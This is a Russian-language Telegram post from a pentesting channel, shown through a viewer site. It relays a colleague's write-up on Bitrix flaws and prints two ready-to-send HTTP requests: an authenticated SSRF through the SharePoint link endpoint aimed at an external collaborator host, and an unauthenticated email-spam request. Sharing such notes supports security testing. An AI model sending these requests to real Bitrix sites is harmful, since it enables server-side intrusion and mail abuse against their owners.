TGViewer
Pentest Notes Pentest Notes @pentestnotes · 3.09K subscribers
Post #214 3.74K
Коллега по цеху @ArroizX сделал пост по уязвимостям в Битрикс😊

Почитать можно тут:
https://t.me/ArroizX_Notes/90

Авторизированная SSRF в Битрикс24 через интеграцию с MS Sharepoint
GET /bitrix/components/bitrix/sharepoint.link/ajax.php?mode=test&sp_server=http://collaborator&sp_user=&sp_pass=&sessid=... HTTP/1.1 
Host: bitrix24
Cookie: ...
Bx-Ajax: true


Неавторизированный спам электронными письмами через sender_sub_confirm.php

POST /bitrix/tools/sender_sub_confirm.php HTTP/1.1 
Host: bitrix
Cookie: ...
Content-Type: application/x-www-form-urlencoded
Content-Length: x

sessid=...&sender_subscription=add&SENDER_SUBSCRIBE_EMAIL=some@some.com


Пойду докину в свой гайд, спасибо)

💫 @pentestnotes
Telegram Заметки склерозного вебера Решил сделать последний в этом году пост про наш любимый битрикс: Авторизированная SSRF в Битрикс24 через интеграцию с MS Sharepoint В Битрикс24 существует возможность интеграции с MS Sharepoint для синхронизации различных списков: клиенты, календарь и…
  • ❤ 16
More from @pentestnotes
  1. Sep 12, 2026⚠️ CVE-2026-85706 - GitLab CE/EE Unauthenticated arbitrary file read CVSS 10.0 Критическая…
  2. Sep 6, 2026CVE-2026-19490 - Auth Bypass в Citrix NetScaler ADC / Gateway 🥤 Критическая уязвимость (C…
  3. Aug 27, 2026🚨 Уязвимость в модуле CMS Bitrix - «КОМТЕТ Касса Курьер» Очередная уязвимость под CMS Bit…
  4. Aug 12, 2026Post #237
  5. Aug 9, 2026Как-то незаметно нас стало 3000 😊 Отдельное спасибо тем, кто пишет в директ с вопросами,…
  6. Jul 30, 2026👩‍💻 #web #offense #заметки #события ➡wp2shell — unauth RCE чейн, уязвимы WordPress'ы вер…
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →